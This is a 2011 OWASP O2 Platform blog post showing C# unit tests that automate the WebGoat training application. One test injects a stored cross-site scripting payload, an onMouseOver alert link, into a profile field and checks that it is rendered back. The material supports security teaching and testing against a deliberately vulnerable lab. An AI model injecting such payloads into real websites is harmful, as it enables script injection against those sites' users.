OWASP O2 Platform Blog

WebGoat – First Example of O2 WebGoat API

This script and video shows a first example of the API that will be developed under O2 that will automate WebGoat’s funcionality, Lessons and Exploits

The WebGoat scripts are included in the local O2 Scripts folder and can also be seen here

Video: WebGoat – First Example of O2’s WebGoat API

Source Code: unit tests from WebGoat_BlackBox_Exploits.cs

        public string Open_Main_Page()
        {
            setup();
            webGoat.openMainPage();
            var pageHtml = ie.html();
            Assert.That(pageHtml.contains("WebGoat"),"Could not find the word WebGoat in the default page");
            if (ie.hasButton("Start WebGoat"))
                ie.button("Start WebGoat").flash().click();
            return "ok";
        }

        [Test]
        public string Exploit_Stage_1_Stored_XSS_OK()
        {
            return Exploit_Stage_1_Stored_XSS("address1");
        }

        [Test]
        public string Exploit_Stage_1_Stored_XSS_Fail()
        {
            return Exploit_Stage_1_Stored_XSS("description");
        }

        private string Exploit_Stage_1_Stored_XSS(string fieldToInsertPayload)
        {
            setup();
            var payload = "<a href=\"\" onMouseOver=\"javascript:alert('xss')\">Over me to see xss</a>";
            webGoat.openMainPage();
            ie.link("Cross-Site Scripting (XSS)").flash().click();
            ie.link("LAB: Cross Site Scripting").flash().click();
            ie.link("Stage 1: Stored XSS").flash();
            ie.field("password").flash().value("larry");
            ie.button("Login").flash().click();
            ie.selectLists()[1].options()[0].select().flash();
            ie.button("ViewProfile").flash().click();
            ie.button("EditProfile").flash().click();
            ie.field(fieldToInsertPayload).value(payload).flash();
            ie.button("UpdateProfile").flash().click();
            Assert.That(ie.html().contains("onmouseover=\"javascript:alert('xss')\""), "Payload was not inserted into page");
            return "ok";
        }

        [Test]
        public string Stage_1_Stored_XSS_Restart_Lesson()
        {
            setup();
            webGoat.openMainPage();
            ie.link("Cross-Site Scripting (XSS)").flash().click();
            ie.link("LAB: Cross Site Scripting").flash().click();
            ie.link("Stage 1: Stored XSS").flash().click();
            ie.link("Restart this Lesson").flash().click();
            return "ok";
        }

July 21, 2011 - Posted by | videos, WebGoat

No comments yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: